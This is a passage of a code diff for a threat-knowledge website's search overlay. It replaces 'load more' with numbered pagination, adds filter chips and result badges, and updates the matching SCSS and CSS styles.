     this.selectedDomains = new Set(DOMAINS);
     this.#renderFilteredSearchResults();
   }
@@ -513,14 +510,14 @@ module.exports = class SearchService {
     this.currentQuery.clean = '';
     this.allSearchResults = [];
     this.searchResults = [];
-    this.selectedPageTypes = new Set(PAGE_TYPES);
+    this.selectedPageTypes = new Set(DEFAULT_PAGE_TYPES);
     this.selectedDomains = new Set(DOMAINS);
-    this.filtersExpanded = false;
+    this.currentPage = 1;
     this.openFilterDropdown = null;
     if (this.render_container?.html) this.render_container.html('');
     this.#updateFilterControls();
     searchBody?.hide?.();
-    loadMoreResults?.hide?.();
+    this.#clearResultsFooter();
   }
 
   /**
@@ -531,7 +528,6 @@ module.exports = class SearchService {
     if (!FILTER_DROPDOWNS.includes(dropdownKey)) return;
 
     this.openFilterDropdown = this.openFilterDropdown === dropdownKey ? null : dropdownKey;
-    if (this.openFilterDropdown) this.filtersExpanded = false;
     this.#updateFilterControls();
   }
 
@@ -539,10 +535,11 @@ module.exports = class SearchService {
    * Closes any compact filter dropdown.
    */
   closeFilterDropdowns() {
-    if (!this.openFilterDropdown) return;
+    if (!this.openFilterDropdown) return false;
 
     this.openFilterDropdown = null;
     this.#updateFilterControls();
+    return true;
   }
 
   /**
@@ -553,15 +550,6 @@ module.exports = class SearchService {
     return this.openFilterDropdown;
   }
 
-  /**
-   * Opens or closes the inline filters panel.
-   */
-  toggleFiltersPanel() {
-    this.filtersExpanded = !this.filtersExpanded;
-    if (this.filtersExpanded) this.openFilterDropdown = null;
-    this.#updateFilterControls();
-  }
-
   /**
    * Counts filter matches for the current query result set.
    * @param {Array<Object>} documents - Search results to count.
@@ -587,26 +575,45 @@ module.exports = class SearchService {
     return { pageTypes, domains };
   }
 
-  /**
-   * Asynchronously loads and renders more search results by increasing the current offset.
-   * This method is used for paginating the search results.
-   *
-   * @async
-   * @function
-   */
-  async loadMoreResults() {
-    this.offset += this.pageLimit;
-    const nextPage = this.searchResults.slice(this.offset, this.offset + this.pageLimit);
-    console.debug('search index results: ', nextPage);
-    this.#renderSearchResults(nextPage);
+  goToPage(pageNumber) {
+    const totalPages = Math.max(1, Math.ceil(this.searchResults.length / this.pageLimit));
+    const nextPage = Math.min(Math.max(pageNumber, 1), totalPages);
+    if (nextPage === this.currentPage) return;
+
+    this.currentPage = nextPage;
+    this.#renderCurrentSearchResultPage();
+    searchBody?.scrollTop?.(0);
+  }
+
+  getPaginationState() {
+    const totalResults = this.searchResults.length;
+    const totalPages = Math.max(1, Math.ceil(totalResults / this.pageLimit));
+    const startResult = totalResults === 0 ? 0 : ((this.currentPage - 1) * this.pageLimit) + 1;
+    const endResult = Math.min(this.currentPage * this.pageLimit, totalResults);
+
+    return {
+      currentPage: this.currentPage,
+      endResult,
+      pageSize: this.pageLimit,
+      pages: this.#pageWindow(totalPages),
+      showPagination: totalPages > 1,
+      startResult,
+      totalPages,
+      totalResults,
+    };
   }
 
   #renderFilteredSearchResults() {
-    this.offset = 0;
+    this.currentPage = 1;
+    this.#renderCurrentSearchResultPage();
+  }
+
+  #renderCurrentSearchResultPage() {
     if (this.render_container?.html) this.render_container.html('');
     this.searchResults = this.applyFilters(this.allSearchResults);
     this.#updateFilterControls();
-    this.#renderSearchResults(this.searchResults.slice(0, this.pageLimit));
+    const startIndex = (this.currentPage - 1) * this.pageLimit;
+    this.#renderSearchResults(this.searchResults.slice(startIndex, startIndex + this.pageLimit));
   }
 
   #matchesSelectedPageTypes(document) {
@@ -632,11 +639,11 @@ module.exports = class SearchService {
 
     this.#setElementText(
       $('[data-search-filter-summary="page-types"]'),
-      this.#selectedSummary(this.selectedPageTypes, PAGE_TYPES),
+      this.#selectedSummary(this.selectedPageTypes, PAGE_TYPES, PAGE_TYPE_LABELS),
     );
     this.#setElementText(
       $('[data-search-filter-summary="domains"]'),
-      this.#selectedSummary(this.selectedDomains, DOMAINS),
+      this.#selectedSummary(this.selectedDomains, DOMAINS, DOMAIN_LABELS),
     );
     PAGE_TYPE_GROUPS.forEach((group) => {
       this.#setElementText(
@@ -644,28 +651,31 @@ module.exports = class SearchService {
         this.#selectedSummary(
           new Set(group.pageTypes.filter((pageType) => this.selectedPageTypes.has(pageType))),
           group.pageTypes,
+          PAGE_TYPE_LABELS,
         ),
       );
     });
 
     PAGE_TYPES.forEach((pageType) => {
       const button = $(`[data-search-filter-page-type="${pageType}"]`);
-      this.#toggleElementClass(button, 'selected', this.selectedPageTypes.has(pageType));
-      this.#setElementAttribute(button, 'aria-pressed', this.selectedPageTypes.has(pageType).toString());
-      this.#setElementText(button?.find?.('.search-filter-count'), counts.pageTypes[pageType]);
+      const selected = this.selectedPageTypes.has(pageType);
+      const chip = button?.closest?.('.search-filter-chip');
+      this.#toggleElementClass(chip, 'selected', selected);
+      this.#setElementProperty(button, 'checked', selected);
+      this.#setElementText(chip?.find?.('.search-filter-count'), this.#countLabel(counts.pageTypes[pageType]));
     });
 
     DOMAINS.forEach((domain) => {
       const button = $(`[data-search-filter-domain="${domain}"]`);
-      this.#toggleElementClass(button, 'selected', this.selectedDomains.has(domain));
-      this.#setElementAttribute(button, 'aria-pressed', this.selectedDomains.has(domain).toString());
-      this.#setElementText(button?.find?.('.search-filter-count'), counts.domains[domain]);
+      const selected = this.selectedDomains.has(domain);
+      const chip = button?.closest?.('.search-filter-chip');
+      this.#toggleElementClass(chip, 'selected', selected);
+      this.#setElementProperty(button, 'checked', selected);
+      this.#setElementText(chip?.find?.('.search-filter-count'), this.#countLabel(counts.domains[domain]));
     });
 
-    searchFiltersPanel?.toggle?.(this.filtersExpanded);
-    this.#setElementAttribute(searchFiltersPanel, 'aria-hidden', (!this.filtersExpanded).toString());
-    this.#setElementText(searchFiltersToggle, this.filtersExpanded ? 'Hide all Filters' : 'Show all Filters');
-    this.#setElementAttribute(searchFiltersToggle, 'aria-expanded', this.filtersExpanded.toString());
+    $('[data-search-filter-reset]')?.toggle?.(this.#visibleFiltersAreActive());
+    $('#search-filters')?.toggleClass?.('has-query', this.currentQuery.clean !== '');
 
     FILTER_DROPDOWNS.forEach((dropdownKey) => {
       const isOpen = this.openFilterDropdown === dropdownKey;
@@ -687,28 +697,159 @@ module.exports = class SearchService {
     if (element?.attr) element.attr(name, value);
   }
 
+  #setElementProperty(element, name, value) {
+    if (element?.prop) element.prop(name, value);
+  }
+
   #toggleElementClass(element, className, value) {
     if (element?.toggleClass) element.toggleClass(className, value);
   }
 
-  #selectedSummary(selectedValues, allValues) {
-    if (selectedValues.size === allValues.length) return 'All';
-    return `${selectedValues.size} selected`;
+  #selectedSummary(selectedValues, allValues, labels) {
+    const visibleSelectedValues = allValues.filter(value => selectedValues.has(value));
+    if (visibleSelectedValues.length === allValues.length) return 'All';
+    if (visibleSelectedValues.length === 0) return 'None';
+    if (visibleSelectedValues.length <= 2) {
+      return visibleSelectedValues.map(value => labels[value]).join(', ');
+    }
+    return `${visibleSelectedValues.length} selected`;
+  }
+
+  #countLabel(count) {
+    return this.currentQuery.clean === '' ? '' : count;
   }
 
-  #emptyResultsHTML() {
-    const filtersAreActive = (
-      this.selectedPageTypes.size !== PAGE_TYPES.length || this.selectedDomains.size !== DOMAINS.length
+  #visibleFiltersAreActive() {
+    const selectedVisiblePageTypes = PAGE_TYPES.filter(pageType => this.selectedPageTypes.has(pageType));
+    return (
+      selectedVisiblePageTypes.length !== PAGE_TYPES.length ||
+      this.selectedDomains.size !== DOMAINS.length
     );
-    if (!filtersAreActive) return '<div class="search-result">no results</div>';
+  }
+
+  #pageWindow(totalPages) {
+    if (totalPages <= 5) return Array.from({ length: totalPages }, (_, index) => index + 1);
+
+    const nearStart = this.currentPage <= 3;
+    const nearEnd = this.currentPage >= totalPages - 2;
+    const nearbyStart = nearStart
+      ? 2
+      : Math.max(2, Math.min(this.currentPage - 2, totalPages - 5));
+    const nearbyEnd = nearEnd
+      ? totalPages - 1
+      : Math.min(totalPages - 1, Math.max(this.currentPage + 2, 5));
+    const pages = [1];
+
+    if (nearbyStart > 2) pages.push('ellipsis');
+
+    pages.push(
+      ...Array.from(
+        { length: nearbyEnd - nearbyStart + 1 },
+        (_, index) => nearbyStart + index,
+      ),
+    );
+
+    if (nearbyEnd < totalPages - 1) pages.push('ellipsis');
+
+    pages.push(totalPages);
+    return pages;
+  }
+
+  #paginationPageToHTML(page) {
+    if (page === 'ellipsis') {
+      return '<span class="search-pagination-ellipsis" aria-hidden="true">&hellip;</span>';
+    }
+
+    const currentClass = page === this.currentPage ? ' current' : '';
+    const currentAttribute = page === this.currentPage ? 'aria-current="page"' : '';
+
+    return `
+                        <button type="button" class="search-pagination-page${currentClass}"
+                            data-search-page="${page}" ${currentAttribute}>
+                            ${page}
+                        </button>
+                    `;
+  }
+
+  #noResultsHTML() {
+    return '<div class="search-results-count" aria-live="polite">No results</div>';
+  }
+
+  #paginationControlsHTML(pagination) {
+    return `
+            <div class="search-pagination" aria-label="Search results pages">
+                <button type="button" class="search-pagination-control search-pagination-control-icon"
+                    data-search-page="${this.currentPage - 1}" aria-label="Previous page"
+                    ${this.currentPage === 1 ? 'disabled' : ''}>
+                    <span class="search-pagination-icon search-pagination-icon-prev" aria-hidden="true"></span>
+                </button>
+                <span class="search-pagination-pages">
+                    ${pagination.pages.map((page) => this.#paginationPageToHTML(page)).join('')}
+                </span>
+                <span class="search-pagination-mobile">Page ${pagination.currentPage} of ${pagination.totalPages}</span>
+                <button type="button" class="search-pagination-control search-pagination-control-icon"
+                    data-search-page="${this.currentPage + 1}" aria-label="Next page"
+                    ${this.currentPage === pagination.totalPages ? 'disabled' : ''}>
+                    <span class="search-pagination-icon search-pagination-icon-next" aria-hidden="true"></span>
+                </button>
+            </div>
+        `;
+  }
+
+  #resultsCountHTML(countLabel) {
+    return `
+            <div class="search-results-count" aria-live="polite">${countLabel}</div>
+        `;
+  }
+
+  #renderResultsFooter() {
+    if (this.currentQuery.clean === '') {
+      this.#clearResultsFooter();
+      return;
+    }
+
+    const pagination = this.getPaginationState();
+    if (pagination.totalResults === 0) {
+      this.#setElementHTML(searchResultsFooter, this.#noResultsHTML());
+      this.#clearResultsPagination();
+      return;
+    }
+
+    const countLabel = pagination.showPagination
+      ? `${pagination.startResult}-${pagination.endResult} of ${pagination.totalResults} results`
+      : `${pagination.totalResults} ${pagination.totalResults === 1 ? 'result' : 'results'}`;
+
+    const paginationHTML = pagination.showPagination ? this.#paginationControlsHTML(pagination) : '';
+
+    this.#setElementHTML(searchResultsFooter, this.#resultsCountHTML(countLabel));
+    this.#setElementHTML(searchResultsPagination, paginationHTML);
+  }
+
+  #clearResultsFooter() {
+    this.#setElementHTML(searchResultsFooter, '');
+    this.#clearResultsPagination();
+  }
+
+  #clearResultsPagination() {
+    this.#setElementHTML(searchResultsPagination, '');
+  }
+
+  #setElementHTML(element, value) {
+    if (element?.html) element.html(value);
+  }
+
+  #emptyResultsHTML() {
+    if (!this.#visibleFiltersAreActive() || this.allSearchResults.length === 0) {
+      return '<div class="search-result">No results</div>';
+    }
 
     return `
             <div class="search-result search-no-results">
-                <div class="title">no results</div>
+                <div class="title">No results match the selected filters</div>
                 <div class="preview">
-                    Active filters may be limiting results.
-                    <button type="button" class="btn btn-default btn-sm" id="clear-search-filters">
-                        clear filters
+                    <button type="button" class="btn btn-default btn-sm" id="clear-search-filters"
+                        data-search-filter-reset>
+                        Reset filters
                     </button>
                 </div>
             </div>
@@ -912,18 +1053,22 @@ module.exports = class SearchService {
 
   #resultBadgesHTML(result) {
     const badges = [];
-    const pageTypeLabel = PAGE_TYPE_LABELS[result.pageType];
+    const pageTypeLabel = this.#pageTypeBadgeLabel(result);
 
-    if (pageTypeLabel) badges.push(pageTypeLabel);
+    if (pageTypeLabel) badges.push({ label: pageTypeLabel, className: 'search-result-badge-page-type' });
     result.domains.forEach((domain) => {
-      if (DOMAIN_LABELS[domain]) badges.push(DOMAIN_LABELS[domain]);
+      if (DOMAIN_LABELS[domain]) {
+        badges.push({ label: DOMAIN_LABELS[domain], className: 'search-result-badge-domain' });
+      }
     });
 
     if (badges.length === 0) return '';
 
     return `
                 <div class="search-result-badges">
-                    ${badges.map(badge => `<span class="search-result-badge">${badge}</span>`).join('')}
+                    ${badges.map((badge) => `
+                        <span class="search-result-badge ${badge.className}">${badge.label}</span>
+                    `).join('')}
                 </div>
         `;
   }
@@ -931,7 +1076,7 @@ module.exports = class SearchService {
   #normalizeDocumentMetadata(document) {
     return {
       ...document,
-      pageType: PAGE_TYPES.includes(document.pageType) ? document.pageType : this.#inferPageType(document.path),
+      pageType: DEFAULT_PAGE_TYPES.includes(document.pageType) ? document.pageType : this.#inferPageType(document.path),
       domains: Array.isArray(document.domains) ? document.domains.filter(domain => DOMAINS.includes(domain)) : [],
     };
   }
@@ -949,7 +1094,33 @@ module.exports = class SearchService {
     if (path.startsWith('/software/')) return 'software';
     if (path.startsWith('/tactics/')) return 'tactics';
     if (path.startsWith('/techniques/')) return 'techniques';
-    return 'resources';
+    if (path.startsWith('/resources/')) return 'resources';
+    return 'misc';
+  }
+
+  #pageTypeBadgeLabel(result) {
+    if (result.pageType === 'misc') return null;
+    if (this.#isOverviewPage(result.path)) return PAGE_TYPE_LABELS[result.pageType];
+
+    return {
+      analytics: 'Analytic',
+      assets: 'Asset',
+      campaigns: 'Campaign',
+      datacomponents: 'Data Component',
+      detectionstrategies: 'Detection Strategy',
+      groups: 'Group',
+      matrices: 'Matrix',
+      mitigations: 'Mitigation',
+      resources: 'Resource',
+      software: 'Software',
+      'sub-techniques': 'Sub-Technique',
+      tactics: 'Tactic',
+      techniques: 'Technique',
+    }[result.pageType];
+  }
+
+  #isOverviewPage(path = '') {
+    return /^\/[^/]+\/index\.html$/.test(path) || /^\/(matrices|tactics|techniques|mitigations)\/(enterprise|mobile|ics)\/index\.html$/.test(path);
   }
 
 }
diff --git a/attack-search/src/settings.js b/attack-search/src/settings.js
index 793605bdfe1..1d5067f413e 100644
--- a/attack-search/src/settings.js
+++ b/attack-search/src/settings.js
@@ -1,4 +1,5 @@
 const baseURL = ''; // TODO migrate from base_url (generated via Pelican)
+const searchCacheSchemaVersion = 2;
 
 const searchFilePaths = [
   'campaigns.json',
@@ -6,6 +7,7 @@ const searchFilePaths = [
   'datacomponents.json',
   'groups.json',
   'matrices.json',
+  'misc.json',
   'mitigations.json',
   'resources.json',
   'software.json',
@@ -17,5 +19,6 @@ const searchFilePaths = [
 ];
 module.exports = {
   baseURL,
+  searchCacheSchemaVersion,
   searchFilePaths,
 };
diff --git a/attack-style/components/_search.scss b/attack-style/components/_search.scss
index 0bef86234c4..fbcdaba0216 100644
--- a/attack-style/components/_search.scss
+++ b/attack-style/components/_search.scss
@@ -21,7 +21,7 @@
   width: 100%;
   height: 100%;
   z-index: 1051; // header is 1050 and we need to overlay header
-  background: rgba(0, 0, 0, 0.35);
+  background: rgb(0 0 0 / 35%);
   padding: 50px;
 
   .overlay-inner {
@@ -29,9 +29,11 @@
     background: color-functions.color(body);
     color: color-functions.on-color(body);
     width: 100%;
+    height: 100%;
     display: flex;
     flex-flow: column;
     max-height: 100%;
+    min-height: 0;
 
     .search-header {
       flex-shrink: 0;
@@ -57,8 +59,8 @@
 
       .search-icons {
         position: absolute;
-        top: 0px;
-        right: 0px;
+        top: 0;
+        right: 0;
 
         > div {
           display: inline-block;
@@ -91,7 +93,8 @@
       flex-shrink: 0;
       padding: 0 50px 12px;
 
-      button {
+      button,
+      .search-filter-chip {
         min-height: 36px;
         border: 1px solid color-functions.border-color(body);
         border-radius: 4px;
@@ -134,14 +137,6 @@
         box-shadow: 0 8px 24px rgb(0 0 0 / 15%);
       }
 
-      .search-filters-panel {
-        margin-top: 12px;
-        padding: 14px;
-        border: 1px solid color-functions.border-color(body);
-        border-radius: 8px;
-      }
-
-      .search-filter-heading,
       .search-filter-group-heading {
         display: flex;
         align-items: center;
@@ -151,15 +146,6 @@
         font-weight: 700;
       }
 
-      .search-filter-heading {
-        text-transform: uppercase;
-        font-size: 0.8rem;
-      }
-
-      .search-filter-group {
-        margin-bottom: 14px;
-      }
-
       .search-filter-actions {
         display: inline-flex;
         gap: 4px;
@@ -177,9 +163,24 @@
         gap: 8px;
       }
 
-      .search-filter-chips button {
+      .search-filter-chip {
+        display: inline-flex;
+        align-items: center;
+        gap: 5px;
         padding: 5px 10px;
 
+        input[type="checkbox"] {
+          position: absolute;
+          width: 1px;
+          height: 1px;
+          padding: 0;
+          margin: -1px;
+          overflow: hidden;
+          clip: rect(0, 0, 0, 0);
+          white-space: nowrap;
+          border: 0;
+        }
+
         &.selected {
           border-color: color-functions.color(active);
           background: color-functions.color(active);
@@ -192,16 +193,30 @@
         font-size: 0.8em;
         opacity: 0.8;
       }
+
+      &:not(.has-query) .search-filter-count {
+        display: none;
+      }
     }
 
     .search-body {
       flex: 1 1 auto;
+      display: flex;
+      flex-direction: column;
+      min-height: 0;
       padding: 0 50px;
       border-top: 1px solid color-functions.border-color(body);
       margin-bottom: 25px;
-      overflow-y: auto;
+      overflow: hidden;
+      scrollbar-gutter: stable;
 
       .results {
+        flex: 1 1 auto;
+        min-height: 0;
+        overflow-y: auto;
+        padding-bottom: 64px;
+        scrollbar-gutter: stable;
+
         .search-result:first-child {
           margin-top: 1.5rem;
         }
@@ -209,18 +224,29 @@
         .search-result-badges {
           display: flex;
           flex-wrap: wrap;
-          gap: 5px;
-          margin: 4px 0 6px;
+          gap: 6px;
+          margin: 6px 0 8px;
         }
 
         .search-result-badge {
-          padding: 1px 6px;
-          border: 1px solid color-functions.border-color(body);
+          padding: 2px 8px;
+          border: 1px solid;
           border-radius: 4px;
-          font-size: 0.75rem;
+          color: white;
+          font-size: 0.8rem;
           font-weight: 700;
         }
 
+        .search-result-badge-page-type {
+          border-color: color-functions.color(active);
+          background: color-functions.color-alternate(active, 1.5);
+        }
+
+        .search-result-badge-domain {
+          border-color: color-functions.color(deemphasis);
+          background: color-functions.color(deemphasis);
+        }
+
         .search-no-results .preview {
           display: flex;
           align-items: center;
@@ -229,9 +255,103 @@
         }
       }
 
-      .load-more-results {
-        // button and stuff for showing more results
-        text-align: center;
+      .search-results-footer {
+        flex-shrink: 0;
+        display: flex;
+        align-items: center;
+        gap: 12px;
+        padding: 12px 0;
+        margin-bottom: 10px;
+      }
+
+      .search-results-count {
+        font-weight: 700;
+      }
+
+      .search-results-pagination {
+        flex-shrink: 0;
+        display: flex;
+        justify-content: flex-end;
+        min-height: 58px;
+        padding: 12px 0 14px;
+        border-top: 1px solid color-functions.border-color(body);
+        background: color-functions.color(body);
+
+        &:empty {
+          display: none;
+        }
+      }
+
+      .search-pagination {
+        display: flex;
+        align-items: center;
+        gap: 5px;
+        flex-wrap: wrap;
+        justify-content: flex-end;
+
+        button {
+          min-height: 36px;
+          padding: 5px 12px;
+          border: 1px solid color-functions.border-color(body);
+          border-radius: 4px;
+          background: color-functions.color(body);
+          color: color-functions.on-color(body);
+          cursor: pointer;
+          font-weight: 700;
+
+          &.current {
+            border-color: color-functions.color(active);
+            background: color-functions.color(active);
+            color: color-functions.on-color(active);
+          }
+
+          &:disabled {
+            cursor: default;
+            opacity: 0.5;
+          }
+        }
+
+        .search-pagination-control-icon {
+          display: inline-flex;
+          align-items: center;
+          justify-content: center;
+          min-width: 36px;
+          padding: 5px;
+        }
+      }
+
+      .search-pagination-pages {
+        display: inline-flex;
+        align-items: center;
+        gap: 5px;
+      }
+
+      .search-pagination-ellipsis {
+        display: inline-flex;
+        align-items: center;
+        min-height: 36px;
+        padding: 0 4px;
+        color: color-functions.color(deemphasis);
+        font-weight: 700;
+      }
+
+      .search-pagination-icon {
+        width: 0;
+        height: 0;
+        border-top: 6px solid transparent;
+        border-bottom: 6px solid transparent;
+      }
+
+      .search-pagination-icon-prev {
+        border-right: 8px solid currentcolor;
+      }
+
+      .search-pagination-icon-next {
+        border-left: 8px solid currentcolor;
+      }
+
+      .search-pagination-mobile {
+        display: none;
       }
     }
   }
@@ -250,7 +370,7 @@
 }
 
 // mobile display search overrides
-@media screen and (min-width: 1px) and (max-width: 767.8px) {
+@media screen and (width >= 1px) and (width <= 767.8px) {
   .overlay.search {
     padding: 15px !important;
   }
@@ -270,7 +390,8 @@
     padding-right: 15px !important;
   }
 
-  .overlay.search .search-filters button {
+  .overlay.search .search-filters button,
+  .overlay.search .search-filter-chip {
     min-height: 40px;
   }
 
@@ -279,6 +400,8 @@
   }
 
   .overlay.search .search-filter-dropdown-menu {
+    position: static !important;
+    margin-top: 6px !important;
     left: 15px !important;
     right: 15px !important;
     width: auto !important;
@@ -286,17 +409,25 @@
     max-width: none !important;
   }
 
-  .overlay.search .search-filters-panel {
-    padding: 10px !important;
-  }
-
-  .overlay.search .search-filter-heading,
   .overlay.search .search-filter-group-heading {
     align-items: flex-start !important;
     flex-direction: column !important;
     gap: 5px !important;
   }
 
+  .overlay.search .search-results-footer {
+    align-items: flex-start !important;
+    flex-direction: column !important;
+  }
+
+  .overlay.search .search-pagination-pages {
+    display: none !important;
+  }
+
+  .overlay.search .search-pagination-mobile {
+    display: inline-block !important;
+  }
+
   .close-search-icon {
     font-size: 25px !important;
     line-height: 25px !important;
diff --git a/attack-theme/static/style-attack.css b/attack-theme/static/style-attack.css
index 7aeedb89620..5e75a1384d2 100644
--- a/attack-theme/static/style-attack.css
+++ b/attack-theme/static/style-attack.css
@@ -1861,9 +1861,11 @@ div#sidebars {
   background: white;
   color: #39434c;
   width: 100%;
+  height: 100%;
   display: flex;
   flex-flow: column;
   max-height: 100%;
+  min-height: 0;
 }
 .overlay.search .overlay-inner .search-header {
   flex-shrink: 0;
@@ -1886,8 +1888,8 @@ div#sidebars {
 }
 .overlay.search .overlay-inner .search-header .search-icons {
   position: absolute;
-  top: 0px;
-  right: 0px;
+  top: 0;
+  right: 0;
 }
 .overlay.search .overlay-inner .search-header .search-icons > div {
   display: inline-block;
@@ -1914,7 +1916,8 @@ div#sidebars {
   flex-shrink: 0;
   padding: 0 50px 12px;
 }
-.overlay.search .overlay-inner .search-filters button {
+.overlay.search .overlay-inner .search-filters button,
+.overlay.search .overlay-inner .search-filters .search-filter-chip {
   min-height: 36px;
   border: 1px solid rgb(223.125, 223.125, 223.125);
   border-radius: 4px;
@@ -1951,13 +1954,6 @@ div#sidebars {
   background: white;
   box-shadow: 0 8px 24px rgba(0, 0, 0, 0.15);
 }
-.overlay.search .overlay-inner .search-filters .search-filters-panel {
-  margin-top: 12px;
-  padding: 14px;
-  border: 1px solid rgb(223.125, 223.125, 223.125);
-  border-radius: 8px;
-}
-.overlay.search .overlay-inner .search-filters .search-filter-heading,
 .overlay.search .overlay-inner .search-filters .search-filter-group-heading {
   display: flex;
   align-items: center;
@@ -1966,13 +1962,6 @@ div#sidebars {
   margin-bottom: 8px;
   font-weight: 700;
 }
-.overlay.search .overlay-inner .search-filters .search-filter-heading {
-  text-transform: uppercase;
-  font-size: 0.8rem;
-}
-.overlay.search .overlay-inner .search-filters .search-filter-group {
-  margin-bottom: 14px;
-}
 .overlay.search .overlay-inner .search-filters .search-filter-actions {
   display: inline-flex;
   gap: 4px;
@@ -1987,10 +1976,24 @@ div#sidebars {
   flex-wrap: wrap;
   gap: 8px;
 }
-.overlay.search .overlay-inner .search-filters .search-filter-chips button {
+.overlay.search .overlay-inner .search-filters .search-filter-chip {
+  display: inline-flex;
+  align-items: center;
+  gap: 5px;
   padding: 5px 10px;
 }
-.overlay.search .overlay-inner .search-filters .search-filter-chips button.selected {
+.overlay.search .overlay-inner .search-filters .search-filter-chip input[type=checkbox] {
+  position: absolute;
+  width: 1px;
+  height: 1px;
+  padding: 0;
+  margin: -1px;
+  overflow: hidden;
+  clip: rect(0, 0, 0, 0);
+  white-space: nowrap;
+  border: 0;
+}
+.overlay.search .overlay-inner .search-filters .search-filter-chip.selected {
   border-color: #0156b3;
   background: #0156b3;
   color: #eaeaea;
@@ -2000,12 +2003,26 @@ div#sidebars {
   font-size: 0.8em;
   opacity: 0.8;
 }
+.overlay.search .overlay-inner .search-filters:not(.has-query) .search-filter-count {
+  display: none;
+}
 .overlay.search .overlay-inner .search-body {
   flex: 1 1 auto;
+  display: flex;
+  flex-direction: column;
+  min-height: 0;
   padding: 0 50px;
   border-top: 1px solid rgb(223.125, 223.125, 223.125);
   margin-bottom: 25px;
+  overflow: hidden;
+  scrollbar-gutter: stable;
+}
+.overlay.search .overlay-inner .search-body .results {
+  flex: 1 1 auto;
+  min-height: 0;
   overflow-y: auto;
+  padding-bottom: 64px;
+  scrollbar-gutter: stable;
 }
 .overlay.search .overlay-inner .search-body .results .search-result:first-child {
   margin-top: 1.5rem;
@@ -2013,24 +2030,114 @@ div#sidebars {
 .overlay.search .overlay-inner .search-body .results .search-result-badges {
   display: flex;
   flex-wrap: wrap;
-  gap: 5px;
-  margin: 4px 0 6px;
+  gap: 6px;
+  margin: 6px 0 8px;
 }
 .overlay.search .overlay-inner .search-body .results .search-result-badge {
-  padding: 1px 6px;
-  border: 1px solid rgb(223.125, 223.125, 223.125);
+  padding: 2px 8px;
+  border: 1px solid;
   border-radius: 4px;
-  font-size: 0.75rem;
+  color: white;
+  font-size: 0.8rem;
   font-weight: 700;
 }
+.overlay.search .overlay-inner .search-body .results .search-result-badge-page-type {
+  border-color: #0156b3;
+  background: rgb(19.975, 92.225, 171.275);
+}
+.overlay.search .overlay-inner .search-body .results .search-result-badge-domain {
+  border-color: #303435;
+  background: #303435;
+}
 .overlay.search .overlay-inner .search-body .results .search-no-results .preview {
   display: flex;
   align-items: center;
   gap: 8px;
   flex-wrap: wrap;
 }
-.overlay.search .overlay-inner .search-body .load-more-results {
-  text-align: center;
+.overlay.search .overlay-inner .search-body .search-results-footer {
+  flex-shrink: 0;
+  display: flex;
+  align-items: center;
+  gap: 12px;
+  padding: 12px 0;
+  margin-bottom: 10px;
+}
+.overlay.search .overlay-inner .search-body .search-results-count {
+  font-weight: 700;
+}
+.overlay.search .overlay-inner .search-body .search-results-pagination {
+  flex-shrink: 0;
+  display: flex;
+  justify-content: flex-end;
+  min-height: 58px;
+  padding: 12px 0 14px;
+  border-top: 1px solid rgb(223.125, 223.125, 223.125);
+  background: white;
+}
+.overlay.search .overlay-inner .search-body .search-results-pagination:empty {
+  display: none;
+}
+.overlay.search .overlay-inner .search-body .search-pagination {
+  display: flex;
+  align-items: center;
+  gap: 5px;
+  flex-wrap: wrap;
+  justify-content: flex-end;
+}
+.overlay.search .overlay-inner .search-body .search-pagination button {
+  min-height: 36px;
+  padding: 5px 12px;
+  border: 1px solid rgb(223.125, 223.125, 223.125);
+  border-radius: 4px;
+  background: white;
+  color: #39434c;
+  cursor: pointer;
+  font-weight: 700;
+}
+.overlay.search .overlay-inner .search-body .search-pagination button.current {
+  border-color: #0156b3;
+  background: #0156b3;
+  color: #eaeaea;
+}
+.overlay.search .overlay-inner .search-body .search-pagination button:disabled {
+  cursor: default;
+  opacity: 0.5;
+}
+.overlay.search .overlay-inner .search-body .search-pagination .search-pagination-control-icon {
+  display: inline-flex;
+  align-items: center;
+  justify-content: center;
+  min-width: 36px;
+  padding: 5px;
+}
+.overlay.search .overlay-inner .search-body .search-pagination-pages {
+  display: inline-flex;
+  align-items: center;
+  gap: 5px;
+}
+.overlay.search .overlay-inner .search-body .search-pagination-ellipsis {
+  display: inline-flex;
+  align-items: center;
+  min-height: 36px;
+  padding: 0 4px;
+  color: #303435;
+  font-weight: 700;
+}
+.overlay.search .overlay-inner .search-body .search-pagination-icon {
+  width: 0;
+  height: 0;
+  border-top: 6px solid transparent;
+  border-bottom: 6px solid transparent;
+}
+.overlay.search .overlay-inner .search-body .search-pagination-icon-prev {
+  border-right: 8px solid currentcolor;
+}
+.overlay.search .overlay-inner .search-body .search-pagination-icon-next {
+  border-left: 8px solid currentcolor;
+}
+.overlay.search .overlay-inner .search-body .search-pagination-mobile {
+  display: none;
 }
 
 .page-search {
@@ -2043,7 +2150,7 @@ div#sidebars {
     flex-basis: 50vh !important;
   }
 }
-@media screen and (min-width: 1px) and (max-width: 767.8px) {
+@media screen and (width >= 1px) and (width <= 767.8px) {
   .overlay.search {
     padding: 15px !important;
   }
@@ -2059,28 +2166,37 @@ div#sidebars {
     padding-left: 15px !important;
     padding-right: 15px !important;
   }
-  .overlay.search .search-filters button {
+  .overlay.search .search-filters button,
+  .overlay.search .search-filter-chip {
     min-height: 40px;
   }
   .overlay.search .search-filter-dropdown {
     position: static !important;
   }
   .overlay.search .search-filter-dropdown-menu {
+    position: static !important;
+    margin-top: 6px !important;
     left: 15px !important;
     right: 15px !important;
     width: auto !important;
     min-width: 0 !important;
     max-width: none !important;
   }
-  .overlay.search .search-filters-panel {
-    padding: 10px !important;
-  }
-  .overlay.search .search-filter-heading,
   .overlay.search .search-filter-group-heading {
     align-items: flex-start !important;
     flex-direction: column !important;
     gap: 5px !important;
   }
+  .overlay.search .search-results-footer {
+    align-items: flex-start !important;
+    flex-direction: column !important;
+  }
+  .overlay.search .search-pagination-pages {
+    display: none !important;
+  }
+  .overlay.search .search-pagination-mobile {
+    display: inline-block !important;
+  }
   .close-search-icon {
     font-size: 25px !important;
     line-height: 25px !important;
diff --git a/attack-theme/static/style-user.css b/attack-theme/static/style-user.css
index 2436ceab11c..0f2df8b35c0 100644
--- a/attack-theme/static/style-user.css
+++ b/attack-theme/static/style-user.css
@@ -1861,9 +1861,11 @@ div#sidebars {
   background: white;
   color: #39434c;
   width: 100%;
+  height: 100%;
   display: flex;
   flex-flow: column;
   max-height: 100%;
+  min-height: 0;
 }
 .overlay.search .overlay-inner .search-header {
   flex-shrink: 0;
@@ -1886,8 +1888,8 @@ div#sidebars {
 }
 .overlay.search .overlay-inner .search-header .search-icons {
   position: absolute;
-  top: 0px;
-  right: 0px;
+  top: 0;
